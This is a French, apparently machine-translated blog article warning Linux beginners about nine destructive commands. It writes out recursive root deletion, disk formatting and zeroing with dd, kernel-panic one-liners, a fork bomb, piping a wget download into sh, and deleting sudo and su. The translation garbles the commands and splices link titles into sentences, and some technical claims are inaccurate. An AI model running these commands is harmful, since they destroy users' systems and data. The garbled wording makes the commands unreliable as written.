9 commandes Linux mortelles que vous ne devriez jamais exécuter

  • Brian Curtis
  • 0
  • 707
  • 218
Publicité

Linux peut être une arme à double tranchant. Cela suppose que vous sachiez ce que vous faites et vous donne la liberté de faire ce que vous voulez. Cela ne vous posera pas de questions. C'est pratique quand tu réellement sachez ce que vous faites, mais cela signifie également que vous pourriez éventuellement rendre votre système inutilisable en quelques secondes.

Nouveau sur la ligne de commande Linux? Pas de soucis. Guide de démarrage rapide du terminal Linux Guide de démarrage rapide de la ligne de commande Linux Guide de démarrage rapide de la ligne de commande Linux Vous pouvez faire beaucoup de choses étonnantes avec des commandes sous Linux et ce n'est pas difficile à apprendre. avec ces 40 commandes essentielles de Linux Un A à Z de Linux - 40 commandes essentielles à connaître Un A à Z de Linux - 40 commandes essentielles à connaître Linux est la troisième roue souvent ignorée de Windows et de Mac. Oui, au cours des dix dernières années, le système d'exploitation open source a gagné du terrain, mais il est encore loin d'être envisagé…. Avec ces deux ressources, vous vous familiariserez rapidement avec la ligne de commande..

Mais que vous soyez novice ou vétéran sous Linux, vous ne devriez jamais exécuter de commande sans savoir exactement ce qu'il fait. Voici quelques-unes des commandes Linux les plus meurtrières que vous voudrez généralement éviter..

Supprimer récursivement

La possibilité pour Linux de supprimer tout ce que vous voulez sans poser de questions est une aubaine, surtout après des années de travail. “Ce fichier ne peut pas être supprimé” erreurs dans Windows. Mais les trolls Internet vous tromperont rapidement en vous présentant des commandes de retrait extrêmement dangereuses pouvant effacer des disques durs entiers..

rm -rf /

Cette ligne exécute la commande de suppression rm avec deux bascules: -r qui force la suppression récursive à travers tous les sous-répertoires et -F qui force la suppression des fichiers en lecture seule sans confirmation. La commande est exécutée sur le / répertoire racine, essuyant essentiellement tout votre système propre.

Notez que ces jours-ci sur la plupart des systèmes Linux, si vous tentiez de le faire, vous recevrez un avertissement. Mais l'avertissement n'est pas garanti, alors ne le faites pas.

Formater le disque dur

Le terminal est particulièrement difficile pour les débutants sous Linux, car il offre plusieurs moyens d’effacer accidentellement son disque dur. La suppression récursive est un gros problème, mais en voici un autre:

mkfs.ext3 / dev / hda

Cette commande formate le disque dur pour utiliser le système de fichiers ext3. Formatage de disque Comment reformater votre disque FAT32 en NTFS - Et les avantages de le faire Comment reformater votre disque FAT32 en NTFS - Et les avantages de le faire Vous ne le savez peut-être pas, mais choisir le bon système de fichiers pour vos lecteurs est en fait assez important. Bien que l’idée principale de tous les systèmes de fichiers soit la même, il existe de nombreux avantages et inconvénients par rapport à chacun… ce n’est pas une action intrinsèquement malveillante, “réinitialiser” le lecteur tel qu'il est “aussi bon que neuf”. En d'autres termes, un disque dur formaté est comme une ardoise vierge.

Le formatage est utile pour les partitions de disque et les lecteurs externes, mais son exécution sur un disque dur entier (tel que / dev / hda) est dangereux et peut laisser votre système dans un état irrécupérable.

Écraser le disque dur

Comme si le formatage accidentel du disque n'était pas assez grave, il est possible d'écraser votre disque dur en utilisant des données brutes. Au moins le formatage de disque est une procédure réelle avec des utilisations réelles; écraser directement son lecteur, en revanche, n’est pas si bon.

commander > / dev / hda

Dans la commande ci-dessus, commander peut être remplacé par n'importe quelle commande Bash. le > L’opérateur redirige le résultat de la commande à sa gauche vers le fichier à sa droite. Dans ce cas, le résultat de la commande de gauche importe peu. Ces données brutes sont redirigées et utilisées pour écraser le disque dur du système..

Comme vous pouvez l'imaginer, cela le rend inutile.

Essuyez le disque dur

Voici un autre moyen de ruiner votre système. Cette fois, la commande mettra complètement à zéro votre disque dur. Aucune corruption de données ou écrasement; il va littéralement remplir votre disque dur de zéros. Un disque dur ne s'essuie pas plus que ça.

dd if = / dev / zero of = / dev / hda

le jj La commande est une instruction de bas niveau principalement utilisée pour écrire des données sur des disques physiques. le si paramètre détermine la source de données, qui dans ce cas est / dev / zero, une spéciale sur Linux qui produit un flux infini de zéros. le de paramètre détermine la destination de ces zéros, qui est la / dev / hda conduire.

Oui, il existe des raisons légitimes de mettre à zéro un lecteur, mais si vous ne connaissez pas ces raisons, vous voudrez peut-être rester à l'écart de cette commande.

Disque dur Implode

Si vous êtes fatigué d'entendre des façons de détruire votre disque dur, accrochez-vous. En voici un de plus pour vous. Sous Linux, il existe un fichier spécial appelé / dev / null cela éliminera toutes les données qui y sont écrites. Vous pouvez le considérer comme un trou noir ou une déchiqueteuse: tout ce qui lui est donné comme entrée sera consommé pour de bon..

mv / / dev / null

Pouvez-vous repérer le danger ici? le mv commande tente de déplacer le répertoire racine du système / dans le trou noir de / dev / null. Cette commande est valide et le résultat est dévastateur: le disque dur est dévoré et il ne reste plus rien. Cela rendra votre système inutilisable.

Cause panique du noyau

Windows a son fameux écran bleu de la mort Windows 8 Crashing? Comment faire pour résoudre facilement les problèmes d'écran bleu et autres problèmes Windows 8 en panne? Comment résoudre facilement les problèmes d'écran bleu et autres problèmes Windows 8 n'est pas parfait. Cela dit, la plupart des écrans bleus et des pannes d'applications ne sont pas la faute de Windows. Nos conseils vous aideront à identifier exactement ce qui ne va pas avec votre PC et à le réparer. . Et malgré les mythes qui circulent, Linux n’est pas un système parfaitement sécurisé 4 Mythes de la cybersécurité qui doivent mourir 4 Mythes de la cybersécurité qui doivent mourir. Parfois, une erreur interne se produit, rendant la récupération impossible. Le système édicte alors quelque chose de similaire à l'écran bleu: a panique du noyau.

dd if = / dev / random of = / dev / port echo 1> / proc / sys / noyau / cat panic / dev / port cat / dev / zero> / dev / mem

Les subtilités des commandes ci-dessus ne sont pas importantes ici. Quoi est L’important est que l’exécution de l’une de ces lignes entraîne une panique du noyau, vous obligeant à redémarrer votre système. Il est préférable d'éviter ces commandes, sauf si vous êtes absolument sûr de savoir ce que vous faites..

Bombe de fourche

Bash est la langue du terminal Linux Est-ce que Linux est déroutant? Voici les termes clés que vous devez savoir: Linux est-il déroutant? Voici les termes clés que vous devez savoir De nos jours, Ubuntu et d'autres distributions Linux modernes s'installent généralement sans accroc (et sans aucune connaissance préalable), mais à mesure que vous les utiliserez, vous rencontrerez inévitablement toutes sortes de terminologies qui… et c'est puissant. Il peut non seulement exécuter des commandes, mais également des fonctions, ce qui facilite l'écriture de scripts permettant d'automatiser les tâches système. Malheureusement, les fonctions ne viennent pas sans leurs propres risques.

: () : |: & ;:

Cette commande obscure s'appelle un bombe à fourche, qui est un type spécial de panique du noyau. Il définit une fonction nommée : qui s’appelle récursivement deux fois lorsqu’il est exécuté. Un des appels récursifs se passe au premier plan tandis que l'autre se passe à l'arrière-plan.

En d'autres termes, chaque fois que cette fonction s'exécute, elle génère deux processus enfants. Ces processus enfants génèrent leurs propres processus enfants et ce cycle se poursuit dans une boucle infinie. Le seul moyen de s'en sortir est de redémarrer le système.

Exécuter le script à distance

Voici une commande innocente qui peut réellement être utile dans la vie quotidienne sur un système Linux. wget récupère le contenu d'une URL Web, qui peut être utilisé pour accéder à des sites Web ou télécharger des fichiers. Cependant, il existe un truc simple qui le rend dangereux:

wget http: // an-untrusted-url -O- | sh

La combinaison ci-dessus télécharge le contenu de l’URL donnée et l’envoie immédiatement au sh commande qui exécute le contenu téléchargé dans le terminal. Si l'URL devait pointer sur un script malveillant, vous scelleriez votre propre destin avec cette commande.

Désactiver les droits de commande racine

Cette dernière commande est simple. Il utilise le couramment utilisé rm commande pour désactiver deux des commandes les plus importantes sur Linux: sudo et su. Longue histoire courte, ces deux vous permettent de courir autre commandes avec autorisations root. Sans eux, la vie sur Linux serait misérable.

rm -f / usr / bin / sudo; rm -f / bin / su

C'est pourquoi vous ne devriez pas exécuter cette commande. Cela force supprime les deux commandes de votre système sans aucune confirmation, vous laissant dans un embouteillage. Là sont manières de restaurer ce que vous avez supprimé Les meilleures façons de récupérer des données sur Linux Les meilleures façons de récupérer des données sur Linux Peu importe que ce soit de votre faute ou non, des problèmes peuvent survenir avec les données stockées sur vos appareils. Les disques durs, les disques SSD et les supports amovibles peuvent potentiellement "perdre" des fichiers à cause de nombreux…, mais ce n'est pas toujours simple ni agréable..

S'il te plait fais attention! Ne pas avoir peur de jouer avec Linux Considérant Linux? 10 questions courantes auxquelles vous avez répondu concernant Linux? 10 questions fréquemment posées Voici les questions les plus courantes que les utilisateurs de Windows ont à propos de Linux. Après avoir parcouru cette liste de questions et réponses, vous devriez vous sentir beaucoup plus à l'aise pour essayer Linux. et le terminal en ligne de commande, mais en même temps, faites vos recherches et n'exécutez rien, sauf si vous êtes absolument sûr de ce qu'il fait. Si quelqu'un te dit de “essayez cette commande”, toujours double et triple vérifier.

Avez-vous déjà exécuté une commande destructive? Qu'est-il arrivé? Est-ce que quelqu'un vous a piégé? Partagez vos pensées et expériences avec nous dans les commentaires!




Personne n'a encore commenté ce post.

De la technologie moderne, simple et abordable.
Votre guide dans le monde de la technologie moderne. Apprenez à utiliser les technologies et les gadgets qui nous entourent chaque jour et à découvrir des choses intéressantes sur Internet.